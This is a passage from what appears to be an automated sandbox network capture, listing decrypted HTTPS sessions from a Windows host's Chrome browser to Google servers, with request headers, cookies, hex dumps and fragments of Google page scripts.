3a 2d 61 29 2c 61 3d 64 2e 66 69 6e 64 Data Ascii: (a,b){var c=a.oa,d=a.WJ().filter(function(e){return _.om(e)});c===null&&(a.menu.getAttribute("tabindex")==="0"\|\|d.length>0&&d[0].getAttribute("tabindex")==="0")&&(c=b?_.ya(d):d[0]);c&&(a=d.findIndex(function(e){return c===e}),d=_.Ynb(d,b?-a-1:-a),a=d.find

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49767	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:30 UTC	1294	OUT	GET /client_204?cs=1&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:31 UTC	1160	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-yThFdSmeyZvrInL2SQv0lA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 12 Dec 2024 21:40:30 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: NID=520=WEzy2GnTVCwd42wvY6cLz11ymcwUARJq0b8yzb-puulQFCcfrMH7cT_brk7HuA4AZKTjaQ3xhalkcNI12rZC3Rfa0rEgjsWoNZAPZW14aRoLTUNgtFCL9TgpV_3_L1wXS4addnHRJpNLLsgPhASys3Q-3WsTx-w7d9ZKvWN9U4jyHfIQy4Ue0Gc1SnRxOl06n3lUikj73ARjQvUjpGU; expires=Fri, 13-Jun-2025 21:40:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49766	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:30 UTC	2738	OUT	GET /async/hpba?vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBc..i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA%2Fbr%3D1%2Frs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.e [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:31 UTC	1012	IN	HTTP/1.1 200 OK Version: 704846385 X-Content-Type-Options: nosniff Content-Type: text/plain; charset=UTF-8 Content-Disposition: attachment; filename="f.txt" Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:30 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:31 UTC	48	IN	Data Raw: 32 61 0d 0a 29 5d 7d 27 0a 32 32 3b 5b 22 54 6c 68 62 5a 34 61 6f 4b 61 69 38 78 63 38 50 67 35 4b 50 75 51 63 22 2c 22 32 31 33 31 22 5d 0d 0a Data Ascii: 2a)]}'22;["TlhbZ4aoKai8xc8Pg5KPuQc","2131"]
2024-12-12 21:40:31 UTC	66	IN	Data Raw: 33 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a Data Ascii: 3cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
2024-12-12 21:40:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49768	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:30 UTC	1046	OUT	GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ogs.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:30 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 2091 Date: Thu, 12 Dec 2024 21:40:30 GMT Expires: Thu, 12 Dec 2024 21:40:30 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:30 UTC	719	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 07 f2 49 44 41 54 78 01 c5 9a 03 f0 ec ea 12 c4 9f 6d a3 74 6d db 38 36 af 6d db b6 6d 9b 87 d7 b6 6d db 58 6f b0 f8 b3 5f 7e b5 e7 4d 6d e5 26 df e6 78 ab ba b2 15 76 cf f4 cc f7 05 3f 9a 13 bf 20 08 7e 5e a9 54 56 2e 97 cb fb 7a 9e 77 4b 84 97 ab d5 aa 1f 2d eb 60 c6 ff 77 a3 e5 1d 11 8e 8f f6 1b e0 fb fe 1f 7f 34 bf 7f 11 89 e5 22 1c 13 91 7a 36 5a e6 22 92 8a 96 a9 60 3b 40 d0 0c 91 e7 21 86 00 cc 53 e2 51 b4 c7 45 04 ee 8b d0 4c 24 eb 10 60 30 31 9e 10 53 28 14 76 8a c4 fc 76 6e 13 5f 19 e2 ee 48 bb 05 b8 10 9d ff cd 48 c4 66 73 9c 38 29 c6 2a f8 d9 08 cd 71 01 96 11 84 5c 1f ed ff f7 39 42 3e f2 e9 7f 29 3e 23 32 17 05 c4 b3 41 8d cd 16 f9 7a bd Data Ascii: PNGIHDR00WIDATxmtm86mmmXo_~Mm&xv? ~^TV.zwK-`w4"z6Z"`;@!SQEL$`01S(vvn_HHfs8)*q\9B>)>#2Az
2024-12-12 21:40:30 UTC	1372	IN	Data Raw: eb dc e4 dd b8 cf fa 3e f3 f9 b4 e8 43 a8 eb e5 a1 0a 8e 5e 50 b9 01 43 db db 25 91 87 3c 84 20 36 e3 18 cf 39 07 82 2c e7 24 30 78 de 4d de 3d cd 60 5c f8 ff 4d 49 2e 91 7c d8 a3 b0 f0 8a fa 1e ff b5 fa 5e fe 83 ea 57 2d 22 88 e7 87 0c 40 04 85 4a fb b3 1e 9e 92 c5 b9 06 ee 4b 98 6d ee 91 1c fd 68 a7 ba d4 78 ef 48 f5 3e f4 63 f5 3e f1 77 21 a2 eb 9e ff aa b4 c5 3a 58 8a 62 25 92 76 cc bc 16 c0 ed 29 93 b6 5b 52 09 84 2d fb f4 3e f2 2b 21 a0 e7 b1 3f ab f7 b9 3f 8a ff 95 9d 16 51 e5 91 47 3a 46 bf a7 e1 a9 b7 6b d6 d0 ac 41 d2 29 60 2a 02 5e 4e 24 1f d4 e5 7b 39 f5 3c bb 50 44 fc 8f 90 37 60 29 d6 33 eb 64 bf d4 0c 06 9e 8e 9d 12 68 af 6b 03 ed 7b 5d 26 d8 be 3b 5e 1e 68 ca 73 3e 42 52 45 50 bb 58 c8 4f 8b 7e 50 7c 5b 10 8e 0b c0 52 5d af 6d 2c bf a1 b4 Data Ascii: >C^PC%< 69,$0xM=`\MI.\|^W-"@JKmhxH>c>w!:Xb%v)[R->+!??QG:FkA)`*^N${9<PD7`)3dhk{]&;^hs>BREPXO~P\|[R]m,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49771	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:31 UTC	1680	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=aLUfP?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:32 UTC	816	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1522 Date: Thu, 12 Dec 2024 21:40:32 GMT Expires: Fri, 12 Dec 2025 21:40:32 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:32 UTC	574	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 79 28 22 61 4c 55 66 50 22 29 3b 0a 76 61 72 20 56 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 51 72 3d 61 7d 3b 76 61 72 20 57 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4f 6e 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 77 69 6e 64 6f 77 3d 61 2e 73 65 72 76 69 63 65 2e 77 69 6e 64 6f 77 2e 67 65 74 28 29 3b 74 68 69 73 2e 77 61 3d 74 68 69 73 2e 51 72 28 29 3b 74 68 69 73 2e 6f 61 3d 77 69 6e 64 6f 77 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3b 74 68 69 73 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 62 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.y("aLUfP");var VEb=function(a){this.Qr=a};var WEb=function(a){_.On.call(this);var b=this;this.window=a.service.window.get();this.wa=this.Qr();this.oa=window.orientation;this.ka=function(){var c=b
2024-12-12 21:40:32 UTC	450	IN	Data Raw: 2c 74 68 69 73 2e 6b 61 29 3b 22 6f 72 69 65 6e 74 61 74 69 6f 6e 22 69 6e 20 77 69 6e 64 6f 77 26 26 0a 74 68 69 73 2e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 74 68 69 73 2e 6b 61 29 7d 3b 5f 2e 47 28 57 45 62 2c 5f 2e 50 6e 29 3b 57 45 62 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 65 72 76 69 63 65 3a 7b 77 69 6e 64 6f 77 3a 5f 2e 51 6e 7d 7d 7d 3b 5f 2e 6d 3d 57 45 62 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 61 64 64 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 61 64 64 28 61 29 7d 3b 5f 2e 6d 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 Data Ascii: ,this.ka);"orientation"in window&&this.window.addEventListener("orientationchange",this.ka)};_.G(WEb,_.Pn);WEb.Ha=function(){return{service:{window:_.Qn}}};_.m=WEb.prototype;_.m.addListener=function(a){this.listeners.add(a)};_.m.removeListener=function(a
2024-12-12 21:40:32 UTC	498	IN	Data Raw: 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 29 29 7d 65 6c 73 65 20 61 3d 74 68 69 73 2e 6b 63 28 29 7c 7c 28 5f 2e 76 61 28 29 3f 5f 2e 76 61 28 29 26 26 5f 2e 70 61 28 29 26 26 21 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 63 6c 75 64 65 73 28 22 47 53 41 22 29 3a 74 68 69 73 2e 77 69 6e 64 6f 77 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 29 3f 5f 2e 72 6c 28 74 68 69 73 2e 77 69 6e 64 6f 77 29 3a 6e 65 77 20 5f 2e 68 6c 28 74 68 69 73 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 74 68 69 73 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 61 2e 68 65 69 67 68 74 3c 61 2e 77 69 64 74 68 7d 3b 0a 5f 2e 6d 2e 64 65 73 74 72 6f 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 Data Ascii: window.innerWidth))}else a=this.kc()\|\|(_.va()?_.va()&&_.pa()&&!navigator.userAgent.includes("GSA"):this.window.visualViewport)?_.rl(this.window):new _.hl(this.window.innerWidth,this.window.innerHeight);return a.height<a.width};_.m.destroy=function(){this

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49779	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	1094	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 400 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-Type: application/binary Content-Encoding: gzip sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:32 UTC	400	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 0a dd 95 6f 4b c3 30 10 c6 bf 8a e4 75 3a ee f2 a7 b9 20 be 98 be 18 28 8a 22 2a 98 05 69 6d dd 06 db 0a d3 a1 1f df eb 36 99 ae 83 6d b2 81 48 e0 da 3e 5c 2e 97 27 3f 9a 10 50 8e a7 c3 e1 d6 21 ac 13 45 39 16 8d c4 10 44 a7 aa 7a c3 f2 e8 ac 3f a9 46 a5 90 02 d1 89 28 83 b8 aa de 8e db 27 a7 93 6c 5c b0 4a 33 6d 96 34 98 8e be d2 a2 04 29 1e 06 e3 a2 7a 7f ad 35 68 f1 e0 97 0f 4a 39 ce b3 58 b2 5e 53 0b b5 aa 6b 20 4f 99 8d c8 b3 b5 d3 dc 83 40 a7 0d 68 9f 2a 4b de 34 9a 5c dd 07 97 30 60 00 a4 d5 34 97 ba c2 81 45 40 53 af d6 15 fc 7d 73 df cf 1f 29 33 9d f3 8b 64 90 f4 ae 9f 72 77 49 ed 5e b7 51 bc cb b6 cc 66 dc dd b6 f9 09 92 24 1a a2 85 e1 75 a3 8b b4 aa 97 bc 64 90 42 5e 3e 27 19 ba 32 31 29 ea 84 b4 cb 93 22 cd 94 2d 72 Data Ascii: oK0u: ("im6mH>\.'?P!E9Dz?F('l\J3m4)z5hJ9X^Sk O@hK4\0`4E@S}s)3drwI^Qf$udB^>'21)"-r
2024-12-12 21:40:33 UTC	957	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://www.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=JOJzuArTc2WJ1KLLBX_l_UvUpx2POqy94f2s4TAfz1dBAZFKmd6tzH7oOGxkdEZ_OUFPe1OMTPNpR5e24BZQwA2pOuetOfUrTlb0ZW2IEN_La7UwJTGdFebYJgnz0geau0mIDt0eej_7XwI724n5MP3PLEYh-3Ct3qfbjClQG7zYvom265bYLT8Z20tFrAO3LQu5iKRd2lFuftJc; expires=Fri, 13-Jun-2025 21:40:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:40:33 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Thu, 12 Dec 2024 21:40:33 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:33 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-12 21:40:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49783	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
